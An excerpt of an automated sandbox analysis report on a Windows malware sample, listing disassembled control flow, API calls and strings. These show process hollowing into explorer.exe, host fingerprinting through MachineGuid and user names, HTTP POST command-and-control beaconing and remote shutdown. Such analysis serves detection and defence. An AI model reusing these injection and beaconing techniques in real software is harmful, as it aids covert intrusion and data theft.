                • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
                • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
                • API String ID: 3548791621-756185880
                • Opcode ID: d5bdae9d2917fb7c3325acbc7d1c1c72b287d8f574372900c4ac1fd37b2edfdc
                • Instruction ID: 4607b823112a6b94fc4da7551c6f37a4841d1210e62a67d515c9a24b11ef1c87
                • Opcode Fuzzy Hash: d5bdae9d2917fb7c3325acbc7d1c1c72b287d8f574372900c4ac1fd37b2edfdc
                • Instruction Fuzzy Hash: 04B14871A40218BFEB20DBA5DC49FAEBBBCEB05704F1040A5F615F7290D7B4AA458B64

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 512 e466e0-e46728 ObtainUserAgentString MultiByteToWideChar 513 e46731-e4674d GetProcessHeap HeapAlloc 512->513 514 e4672a-e4672f 512->514 516 e46767 513->516 517 e4674f-e46765 MultiByteToWideChar 513->517 515 e46769-e46778 call e46520 514->515 520 e4677a-e46792 InternetOpenW 515->520 516->515 517->515 521 e46916-e4691a 520->521 522 e46798-e467af 520->522 524 e46926-e46937 521->524 525 e4691c-e46921 521->525 523 e467b6-e467cb InternetSetOptionW 522->523 523->523 526 e467cd-e467eb InternetConnectW 523->526 527 e46941-e46946 524->527 528 e46939-e4693f GetProcessHeap HeapFree 524->528 525->520 529 e467f1-e46821 HttpOpenRequestW 526->529 530 e46908-e46911 InternetCloseHandle 526->530 531 e46950-e46955 527->531 532 e46948-e4694e GetProcessHeap HeapFree 527->532 528->527 533 e46827-e46848 InternetQueryOptionW 529->533 534 e468fc 529->534 530->524 535 e46913 530->535 536 e46957-e4695d GetProcessHeap HeapFree 531->536 537 e4695f-e46967 531->537 532->531 539 e46860-e46876 HttpSendRequestW 533->539 540 e4684a-e4685a InternetSetOptionW 533->540 538 e46902-e46905 InternetCloseHandle 534->538 535->521 536->537 538->530 541 e468f1-e468fa InternetCloseHandle 539->541 542 e46878-e4687a 539->542 540->539 541->538 543 e46880-e4689b InternetQueryDataAvailable 542->543 544 e468e1-e468e3 543->544 545 e4689d-e468a5 543->545 544->543 548 e468e5-e468ea 544->548 546 e468a7-e468b6 GetProcessHeap HeapAlloc 545->546 547 e468b8-e468c2 GetProcessHeap HeapReAlloc 545->547 551 e468c8-e468df InternetReadFile 546->551 547->551 549 e468ec 548->549 550 e468ee 548->550 549->550 550->541 551->544
                APIs
                • ObtainUserAgentString.URLMON(00000000,?,?), ref: 00E46702
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46722
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E4673B
                • HeapAlloc.KERNEL32(00000000), ref: 00E46742
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46763
                • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46788
                • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00E467C1
                • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E467DE
                • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00E46817
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E46840
                • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 00E4685A
                • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 00E4686E
                • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 00E46890
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E468A9
                • HeapAlloc.KERNEL32(00000000), ref: 00E468B0
                • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 00E468BB
                • HeapReAlloc.KERNEL32(00000000), ref: 00E468C2
                • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00E468D6
                • InternetCloseHandle.WININET(00000000), ref: 00E468F8
                • InternetCloseHandle.WININET(00000000), ref: 00E46903
                • InternetCloseHandle.WININET(00000000), ref: 00E46909
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E4693C
                • HeapFree.KERNEL32(00000000), ref: 00E4693F
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E4694B
                • HeapFree.KERNEL32(00000000), ref: 00E4694E
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E4695A
                • HeapFree.KERNEL32(00000000), ref: 00E4695D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
                • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
                • API String ID: 2744214989-3343008755
                • Opcode ID: 90d35e2638e4392b3746b765972c413136df23013f96c249ccc1b5ce2d33280a
                • Instruction ID: bb3b81fce81b0c199f572178c7ea6d99000a7050781c62e74b619fc5723945ed
                • Opcode Fuzzy Hash: 90d35e2638e4392b3746b765972c413136df23013f96c249ccc1b5ce2d33280a
                • Instruction Fuzzy Hash: 01719175A40219BFEB209BA5DC49FAEBBB8EB4A714F140015FA11F7290DBB0D9058B61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 552 e45b30-e45b43 553 e45e98-e45ea0 552->553 554 e45b49-e45b6a GetModuleHandleW GetProcAddress 552->554 554->553 555 e45b70-e45b81 554->555 555->553 556 e45b87-e45b8e 555->556 557 e45b97-e45b9a 556->557 558 e45b90-e45b95 556->558 557->553 560 e45ba0 557->560 559 e45ba5 558->559 561 e45ba7-e45bb0 559->561 560->559 561->561 562 e45bb2 561->562 563 e45bb4-e45bc0 562->563 563->563 564 e45bc2-e45bc8 563->564 565 e45bd0-e45bde 564->565 565->565 566 e45be0 565->566 567 e45be2-e45beb 566->567 567->567 568 e45bed-e45c25 CreateProcessW 567->568 569 e45e8f-e45e97 568->569 570 e45c2b-e45c6c NtQueryInformationProcess ReadProcessMemory GetThreadContext 568->570 571 e45c72-e45c7f 570->571 572 e45e7f-e45e8d CloseHandle * 2 570->572 571->572 574 e45c85-e45cd4 VirtualAllocEx WriteProcessMemory 571->574 572->569 575 e45cd6-e45ce7 574->575 576 e45d0c-e45d10 574->576 579 e45cfd-e45d08 575->579 580 e45ce9-e45cfb WriteProcessMemory 575->580 577 e45d16-e45d20 576->577 578 e45e40-e45e79 WriteProcessMemory SetThreadContext ResumeThread 576->578 577->578 581 e45d26-e45d28 577->581 578->572 579->575 582 e45d0a 579->582 580->579 583 e45d30-e45d38 581->583 582->576 583->583 584 e45d3a-e45d4d 583->584 585 e45d6e-e45d7e 584->585 586 e45d4f-e45d54 584->586 588 e45d84-e45d8f 585->588 589 e45e26-e45e34 585->589 587 e45d56-e45d61 586->587 587->589 591 e45d67-e45d69 587->591 592 e45d90-e45da3 588->592 589->581 590 e45e3a 589->590 590->578 591->587 593 e45d6b 591->593 594 e45e1e-e45e20 592->594 595 e45da9-e45dab 592->595 593->585 594->589 594->592 596 e45db0-e45dc2 595->596 597 e45dc4-e45e0e ReadProcessMemory WriteProcessMemory 596->597 598 e45e10 596->598 599 e45e13-e45e19 597->599 598->599 599->596 600 e45e1b 599->600 600->594
                APIs
                • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 00E45B53
                • GetProcAddress.KERNEL32(00000000), ref: 00E45B5A
                • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 00E45C1D
                • NtQueryInformationProcess.NTDLL ref: 00E45C3A
                • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00E45C54
                • GetThreadContext.KERNEL32(?,00010007), ref: 00E45C64
                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 00E45C98
                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00E45CC2
                • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 00E45CFB
                • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00E45DE2
                • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 00E45DFA
                • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 00E45E55
                • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 00E45E70
                • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00E45E79
                • CloseHandle.KERNEL32(?), ref: 00E45E88
                • CloseHandle.KERNEL32(00000000), ref: 00E45E8D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
                • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
                • API String ID: 918112823-4001407722
                • Opcode ID: 29d2af587b54ebb2c1766cfd46464b6a0955baf83d5e9fb7f7b4cc2ea8b7ad0e
                • Instruction ID: dc6095f5aa2371388a52b389e147034d2463e843b46bc197063aa013a4e32dc9
                • Opcode Fuzzy Hash: 29d2af587b54ebb2c1766cfd46464b6a0955baf83d5e9fb7f7b4cc2ea8b7ad0e
                • Instruction Fuzzy Hash: 84B16B76E00219AFDF10CF99EC84BAEBBB5FF49304F2450A9E905B7292D7319945CB50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 680 e48356-e48359 681 e4833f-e4834b Sleep 680->681 682 e4835b-e48368 680->682 683 e47de8-e47e09 call e466e0 681->683 685 e482ec-e48309 682->685 686 e4836a-e483a8 InitializeCriticalSection 682->686 696 e47e1d-e47e2b lstrcmpA 683->696 697 e47e0b-e47e1b Sleep 683->697 691 e4832e-e48335 call e45650 685->691 692 e4830b 685->692 688 e483b3-e48469 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 686->688 689 e483ae call e47050 686->689 694 e48561-e48563 ExitProcess 688->694 695 e4846f-e484bd call e424e0 WSAStartup CryptAcquireContextA 688->695 689->688 691->681 698 e48311-e4832b call e42650 call e47460 692->698 699 e4830d-e4830f 692->699 711 e484df 695->711 712 e484bf-e484d9 CryptAcquireContextA 695->712 703 e47e2d-e47e3c call e48fc0 call e45650 696->703 704 e47e3e-e47e68 call e46490 * 2 call e462d0 696->704 697->683 698->691 699->691 699->698 703->683 726 e47e6e-e47e70 704->726 727 e482eb-e48309 GetTickCount64 704->727 716 e484e1-e484ef 711->716 712->694 712->711 716->716 720 e484f1-e484f5 716->720 722 e484f7 720->722 723 e48511-e48560 CoInitializeEx ExpandEnvironmentStringsW CreateFileW 720->723 725 e48500-e4850f 722->725 725->723 725->725 726->727 728 e47e76-e47e7c 726->728 727->691 727->692 728->727 729 e47e82-e47ef5 call e45670 call e47480 call e424b0 call e45630 call e45670 call e46490 call e42650 call e47460 StrToIntA 728->729 746 e482e1-e482e9 call e45650 729->746 747 e47efb 729->747 746->691 749 e47f02-e47f16 call e46490 * 2 747->749 750 e482c3-e482ca call e46250 747->750 749->746 759 e47f1c-e47f1e 749->759 750->746 757 e482cc-e482db InitiateSystemShutdownExW 750->757 757->746 759->746 760 e47f24-e47f4d StrToIntA call e462d0 call e45630 759->760 760->746 765 e47f53-e47f59 760->765 766 e47f9f-e47fa2 765->766 767 e47f5b-e47f9d GetSystemDirectoryW PathCombineW wnsprintfW 765->767 768 e47ff4-e4803b GetModuleHandleA GetProcAddress * 2 766->768 769 e47fa4-e47fbd call e462d0 call e42790 766->769 767->768 770 e48043-e48047 768->770 771 e4803d-e48040 768->771 769->768 781 e47fbf-e47fef ExpandEnvironmentStringsW wnsprintfW call e45650 769->781 773 e48081-e480a5 LoadLibraryA GetProcAddress 770->773 774 e48049-e4805e call e45720 770->774 771->770 779 e480a9-e480ae 773->779 774->779 784 e48060-e4807f call e462d0 call e42680 call e45650 774->784 782 e480b5-e480c7 call e45630 779->782 783 e480b0 779->783 781->768 790 e480cd-e48152 call e48f60 call e47480 wsprintfA wnsprintfA call e424b0 call e466e0 782->790 791 e48168-e4817f call e45650 * 3 782->791 783->782 784->779 810 e48154-e48156 call e45650 790->810 811 e4815b-e48165 call e45650 790->811 791->691 810->811 811->791
                APIs
                • Sleep.KERNEL32(00000000), ref: 00E47E16
                • lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
                • StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
                • Sleep.KERNEL32(00000000), ref: 00E48346
                • InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2
                  • Part of subcall function 00E47050: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
                  • Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
                  • Part of subcall function 00E47050: GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
                  • Part of subcall function 00E47050: HeapAlloc.KERNEL32(00000000), ref: 00E470B9
                  • Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
                  • Part of subcall function 00E47050: RegCloseKey.ADVAPI32(80000002), ref: 00E470E8
                • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
                • StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
                • wsprintfA.USER32 ref: 00E4843F
                • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
                • GetLastError.KERNEL32 ref: 00E4845E
                • ExitProcess.KERNEL32 ref: 00E48563
                  • Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2
                • WSAStartup.WS2_32(00000202,?), ref: 00E4849C
                • CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
                • CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1
                • CoInitializeEx.OLE32(00000000,00000000), ref: 00E4851C
                • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00E48533
                • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00E48552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: AcquireContextCreateCryptHeapInitializeProcessQuerySleepValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumelstrcmpwsprintf
                • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                • API String ID: 3969963109-2941900213
                • Opcode ID: 7ac20deece6c471b320a3cd494b4035452f3619937a9682a25b8c0a327c4fea7
                • Instruction ID: d2c6036e343ceef82f90aa659ec52802278f75a700f86adb369f829de8401a1f
                • Opcode Fuzzy Hash: 7ac20deece6c471b320a3cd494b4035452f3619937a9682a25b8c0a327c4fea7
                • Instruction Fuzzy Hash: 29611670E803089FEB24DFA5ED4ABAD77B8FB05305F1450AAF504F7282DB7499498B91

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 815 e47690-e476d4 GetPEB LsaOpenPolicy 816 e476d6-e476e7 LsaQueryInformationPolicy 815->816 817 e4774b-e47799 GetComputerNameW GetUserNameW 815->817 820 e47742-e47745 LsaClose 816->820 821 e476e9-e476ef 816->821 818 e477ab-e477ad 817->818 819 e4779b 817->819 823 e477b0-e477c8 call e424e0 818->823 822 e477a0-e477a9 819->822 820->817 824 e476f1-e4770c GetProcessHeap HeapAlloc 821->824 825 e4773b-e4773c LsaFreeMemory 821->825 822->818 822->822 832 e477ca-e47834 call e47480 wsprintfA * 2 823->832 827 e4770e-e4771c 824->827 828 e47738 824->828 825->820 830 e47732-e47734 827->830 831 e4771e-e47725 827->831 828->825 830->828 831->830 833 e47727-e47730 831->833 836 e47836-e47845 832->836 837 e47847-e4787b call e466e0 832->837 833->830 833->833 836->836 836->837 840 e47885-e47887 837->840 841 e4787d-e47883 GetProcessHeap HeapFree 837->841 842 e47891-e47897 840->842 843 e47889-e4788f GetProcessHeap HeapFree 840->843 841->840 843->842
                APIs
                • LsaOpenPolicy.ADVAPI32(00000000,00E4A060,00000001,?), ref: 00E476CC
                • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00E476DF
                • GetProcessHeap.KERNEL32(00000008,?), ref: 00E476FB
                • HeapAlloc.KERNEL32(00000000), ref: 00E47702
                • LsaFreeMemory.ADVAPI32(?), ref: 00E4773C
                • LsaClose.ADVAPI32(?), ref: 00E47745
                • GetComputerNameW.KERNEL32(?,?), ref: 00E47764
                • GetUserNameW.ADVAPI32(?,00000101), ref: 00E47775
                • wsprintfA.USER32 ref: 00E477F6
                • wsprintfA.USER32 ref: 00E47829
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E47880
                • HeapFree.KERNEL32(00000000), ref: 00E47883
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E4788C
                • HeapFree.KERNEL32(00000000), ref: 00E4788F
                Strings
                • %d|%s|%.16s|, xrefs: 00E477F0
                • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00E47786
                • %s|%d.%d (%d)|%S|%S|%S, xrefs: 00E47823
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
                • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                • API String ID: 3257352186-369990036
                • Opcode ID: e29fbcf070a735b75fce10493b1cc069e02414e9bfe333853f5483074894b568
                • Instruction ID: 064cc68019c363ec1f7a7c763c015a20fedf3efba66a6260fcade2bb237ea705
                • Opcode Fuzzy Hash: e29fbcf070a735b75fce10493b1cc069e02414e9bfe333853f5483074894b568
                • Instruction Fuzzy Hash: CB51C275A04259AFDB20CFA5DC48BAFBBB9FF48304F4400A6E984B7151D7709A46CBA0

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 844 e478a0-e478b4 845 e478b6-e478be 844->845 846 e47918-e47930 844->846 845->846 849 e478c0-e478c8 845->849 847 e47932-e47938 846->847 848 e4793a-e4793c 846->848 847->847 847->848 850 e47940-e47955 call e424e0 848->850 851 e478d0-e478da 849->851 861 e47957-e479b8 call e47480 wnsprintfA wsprintfA 850->861 852 e478e7-e478ee StrCmpNIA 851->852 853 e478dc-e478de 851->853 856 e478f0-e478fd 852->856 857 e47901-e47912 852->857 853->852 855 e478e0-e478e5 853->855 855->852 855->855 856->851 859 e478ff 856->859 857->846 860 e47d84-e47d8a 857->860 859->846 864 e479d1-e479fa call e466e0 861->864 865 e479ba 861->865 864->860 869 e47a00 864->869 866 e479c0-e479cf 865->866 866->864 866->866 870 e47a02-e47a0b 869->870 871 e47a10-e47a18 870->871 872 e47a20-e47a22 871->872 873 e47a1a-e47a1c 871->873 875 e47a24-e47a30 872->875 876 e47a35-e47a3b 872->876 873->871 874 e47a1e 873->874 874->870 877 e47aea-e47afb 875->877 878 e47a40-e47a48 876->878 879 e47b01-e47b03 877->879 880 e47d72-e47d7e GetProcessHeap HeapFree 877->880 881 e47a50-e47a52 878->881 882 e47a4a-e47a4c 878->882 879->880 885 e47b09-e47b10 879->885 880->860 883 e47a54-e47a56 881->883 884 e47a58 881->884 882->878 886 e47a4e 882->886 887 e47a5b-e47a63 883->887 884->887 885->880 888 e47b16 885->888 886->876 889 e47a65-e47a6c 887->889 890 e47a71 887->890 891 e47b18-e47b23 888->891 889->877 892 e47a74-e47a7f 890->892 891->891 893 e47b25-e47b34 call e47480 891->893 894 e47a80-e47a88 892->894 902 e47b36-e47b45 893->902 903 e47b47-e47b4d 893->903 896 e47a90-e47a92 894->896 897 e47a8a-e47a8c 894->897 900 e47a94-e47a9e 896->900 901 e47aa0-e47aab 896->901 897->894 899 e47a8e 897->899 899->892 906 e47ae7 900->906 907 e47ab0-e47ab8 901->907 902->902 902->903 904 e47b53-e47b56 903->904 905 e47d6b-e47d6d call e45b30 903->905 908 e47d60-e47d69 call e45eb0 904->908 909 e47b5c-e47b5f 904->909 905->880 906->877 911 e47ac0-e47ac2 907->911 912 e47aba-e47abc 907->912 908->880 909->880 916 e47b65-e47b6a 909->916 913 e47ac4-e47ac6 911->913 914 e47ac8 911->914 912->907 917 e47abe 912->917 918 e47acb-e47ad5 913->918 914->918 916->880 920 e47b70-e47b78 916->920 917->901 918->906 921 e47ad7-e47ad9 918->921 922 e47b8a-e47b8e 920->922 923 e47b7a 920->923 921->906 924 e47adb 921->924 926 e47b90-e47ba0 922->926 927 e47ba2-e47bac 922->927 925 e47b80-e47b88 923->925 928 e47ae0-e47ae5 924->928 925->922 925->925 926->926 926->927 929 e47bb0-e47bb8 927->929 928->906 928->928 929->929 930 e47bba-e47bbe 929->930 931 e47bc0-e47bd0 930->931 932 e47bd2-e47be8 call e45900 930->932 931->931 931->932 932->880 935 e47bee-e47c15 932->935 935->880 936 e47c1b 935->936 937 e47c20-e47c33 lstrcmpA 936->937 938 e47c35-e47c3f 937->938 939 e47c46-e47c58 937->939 938->937 940 e47c41 938->940 939->880 941 e47c5e-e47c62 939->941 940->880 942 e47c64-e47c69 941->942 943 e47c6b-e47c98 EnterCriticalSection 941->943 942->942 942->943 945 e47cb8-e47cbc 943->945 946 e47c9a-e47ca2 943->946 947 e47cd4-e47ce4 945->947 948 e47cbe 945->948 949 e47ca5-e47ca8 946->949 951 e47ce6-e47cf5 GetProcessHeap HeapAlloc 947->951 952 e47cf7-e47d01 GetProcessHeap HeapReAlloc 947->952 950 e47cc0-e47cc4 948->950 953 e47cb2 949->953 954 e47caa-e47cb0 949->954 955 e47cc6-e47ccc 950->955 956 e47cd0-e47cd2 950->956 957 e47d07-e47d11 951->957 952->957 953->945 954->949 954->953 955->950 958 e47cce 955->958 956->947 959 e47d2a-e47d31 956->959 960 e47d53-e47d5e LeaveCriticalSection 957->960 961 e47d13-e47d27 957->961 958->947 962 e47d33-e47d35 959->962 963 e47d4f 959->963 960->880 961->959 964 e47d37-e47d3c 962->964 965 e47d3e-e47d42 962->965 963->960 964->964 964->965 965->963 966 e47d44-e47d4d 965->966 966->963 966->966
                APIs
                • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00E478EA
                • wnsprintfA.SHLWAPI ref: 00E47982
                • wsprintfA.USER32 ref: 00E479A9
                • lstrcmpA.KERNEL32(?,Start), ref: 00E47C2B
                • EnterCriticalSection.KERNEL32(00E4A080), ref: 00E47C84
                • GetProcessHeap.KERNEL32(00000008,?), ref: 00E47CE8
                • HeapAlloc.KERNEL32(00000000), ref: 00E47CEF
                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 00E47CFA
                • HeapReAlloc.KERNEL32(00000000), ref: 00E47D01
                • LeaveCriticalSection.KERNEL32(00E4A080), ref: 00E47D58
                  • Part of subcall function 00E45EB0: GetModuleHandleW.KERNEL32(ntdll), ref: 00E45ECD
                  • Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00E45EE1
                  • Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00E45EEC
                  • Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00E45EF7
                  • Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00E45F02
                  • Part of subcall function 00E45EB0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00E45F0D
                  • Part of subcall function 00E45EB0: GetTempPathW.KERNEL32(000000F6,?), ref: 00E45F26
                  • Part of subcall function 00E45EB0: wnsprintfW.SHLWAPI ref: 00E45F61
                  • Part of subcall function 00E45EB0: PathCombineW.SHLWAPI(?,?,?), ref: 00E45F7B
                  • Part of subcall function 00E45EB0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00E45FA2
                  • Part of subcall function 00E45EB0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E45FC6
                  • Part of subcall function 00E45EB0: SetEndOfFile.KERNEL32(00000000), ref: 00E45FC9
                  • Part of subcall function 00E45EB0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E45FD6
                  • Part of subcall function 00E45EB0: wnsprintfW.SHLWAPI ref: 00E45FF4
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E47D77
                • HeapFree.KERNEL32(00000000), ref: 00E47D7E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
                • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
                • API String ID: 851647271-3778496198
                • Opcode ID: aa9360f5ccff9acb9a401d6a95a999542e821997d3225679276631be1b5ab3bc
                • Instruction ID: cf14c502d3b95d3c253f9d26ede0b9affe5c7bc8d18d5c973c4de56f8fc27927
                • Opcode Fuzzy Hash: aa9360f5ccff9acb9a401d6a95a999542e821997d3225679276631be1b5ab3bc
                • Instruction Fuzzy Hash: 25E12534E086568FDB298F68E84077E77A6FF86308F19A0ADD891B7202DB308D4587D0
                APIs
                • InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2
                  • Part of subcall function 00E47050: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
                  • Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
                  • Part of subcall function 00E47050: GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
                  • Part of subcall function 00E47050: HeapAlloc.KERNEL32(00000000), ref: 00E470B9
                  • Part of subcall function 00E47050: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
                  • Part of subcall function 00E47050: RegCloseKey.ADVAPI32(80000002), ref: 00E470E8
                • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
                • StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
                • wsprintfA.USER32 ref: 00E4843F
                • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
                • GetLastError.KERNEL32 ref: 00E4845E
                • ExitProcess.KERNEL32 ref: 00E48563
                  • Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2
                • WSAStartup.WS2_32(00000202,?), ref: 00E4849C
